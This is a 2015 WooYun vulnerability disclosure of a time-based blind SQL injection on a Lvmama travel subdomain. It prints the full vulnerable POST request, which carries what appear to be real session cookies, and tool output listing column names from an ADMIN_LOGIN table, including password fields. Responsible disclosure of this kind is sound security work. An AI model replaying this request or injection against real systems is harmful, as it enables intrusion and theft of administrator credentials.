当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142081

漏洞标题:驴妈妈旅游网某分站SQL注入漏洞可读取数据表(DBA权限/时间盲注)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-03 12:35

修复时间:2015-11-22 11:02

公开时间:2015-11-22 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

测试:

POST /b2b/prod_list_ajax.jsp HTTP/1.1
Host: fenxiao.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 178
Accept: */*
Origin: http://fenxiao.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fenxiao.lvmama.com/b2b/prod_list.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKb1X79EWfLzjUDjwAAg==; CoreID6=81323363387714425754327&ci=90409730; _lvTrack_UUID=1474E648-6D2E-44E3-AF56-2B3DE7634870; lvsessionid=6eda4b74-db89-4ed6-b3f0-
a628d51b5430_18400608; cityName=%u5317%u4EAC; stationCode=BJ; stationId=13; stationPinyin=beijing; JSESSIONID=fK6cK_BxQZF4; startadd=10011;
a1a50777ae54df93c3348cef08dce3c3=1Zj9Xd0N2Xh5Wb9Ua60ma5Iaa5IaY5GiZ6ASb5zmY5w+mJiR2Xpxmb9s2chFzc0EmJfd3YzVFdp9DZy0TNwAjMmc;
87975ce5500b2471292c9d022b9ef2db=3YzVFdp9DZy0DO4UTMmgHb0l2XklSPjZXd0N3X5RGc9UiMnZ2X1N3cfRWa9QjMwUDM3InJzVXZfJmbtFTZm0XafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFTMmQXdlNlcp9DZ
x0jM0MTNmY; sourceid=19; 67df798e21e2dfa38ce087214349f9b3=mcs9VZp9DZz0nJzVXZfJWa9QTMzIDN2UmJiR2Xpxmb9s2chFzc0EmJfd3YzVFdu9WYl1ePKWOolWOtlWOtYa
+n6SuuueeoQeuhFWOrPWCujZXd0N2XklTP4ITNxgCOnZ2X1N3cfRWa9QjMwUDM3IgJ==; _lvTrack_sessionID=1BC64181-12AA-4FE6-8B8F-6AC606BDCB6D; orderFromChannel=bing; __utmt=1;
__xsptplus443=443.2.1442580067.1442580462.8%234%7C%7C%7C%7C%7C%23%23KC--73_S5PSqQXPHmXJaDKIHJH8ApGTC%23; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442576325;
Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442580462; __utma=30114658.555334212.1442575433.1442575433.1442579732.2; __utmb=30114658.46.10.1442579732; __utmc=30114658;
__utmz=30114658.1442579732.2.2.utmcsr=pufa.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/; bfd_s=30114658.98025856.1442579732433;
tmc=38.30114658.23301528.1442579732436.1442580403663.1442580462914; tma=30114658.30289188.1442575434188.1442575434188.1442575434188.1; tmd=53.30114658.30289188.1442575434188.;
utag_main=v_id:014fe07d6a09001ee167fbff27b12206d001806500bd0$_sn:1$_ss:0$_pn:2%3Bexp-session$_st:1442582263890$ses_id:1442580359689%3Bexp-session;
bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDn9J9XTZq5ICUVFiY5xaaSGnswzLnZ5fMPdL9LvzsOTorEZlMtMZiixNZ%2FNAdp4hsOM61BZPExUO3lqlR89zEcWLn%2FRQf9TdmwRUiOVC
%2BY7kW1oQwcXil0%2B6ndkhaE9Vcj69K71aZWMxeLoPWcJ4ylPaJgRxh2xifKqrnirxUPjo%3D; bfd_g=9de2782bcb754fd7000031ec004eb3b555fbf449; 90409730_clogin=v=1&l=1442579732&e=1442582334485;
dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP4ITNxgCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZy0TNwAjMmcXdlNlcu9WYl1ePKWOolWOtlWOtYa
+n6SuuueeoQeuhFWOrPWCupZ1cn9mc19Dcw0mJzl2XpR3c9ASMkZlYs9War5XPhNXYxMCNyZ2blx2XklTPmMXdlNlcp9DZx0jM0MTNmY
start=0&limit=40&key=3213123&tree_id=0&cust_id=&area=&ad=&fw=&pay=&confirm=&gt=&tag=&line=&group=&tname=&grade=&internet=&brekker=&action=list&testid=1003&sort=view_name&dir=D
ESC


5.jpg

56.jpg

漏洞证明:

权限:

3333.jpg


ADMIN_LOGIN:

[08:29:32] NAME
[08:29:32] EXTENSION_ID
[08:29:32] ACCOUNTS
[08:29:32] PROVINCIAL
[08:29:32] CHROMOSOME_ID
[08:29:32] OPERATIONID
[08:29:32] TRANSACTION_ID
[08:29:32] MSG_ID
[08:29:37] ACCOUNT_ID
[08:29:41] SCHLUSSELWORT
[08:29:49] PWD
[08:30:05] AIM
[08:30:20] TEMP_PASS


修复方案:

自测 :-)

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-08 11:01

厂商回复:

thx

最新状态:

暂无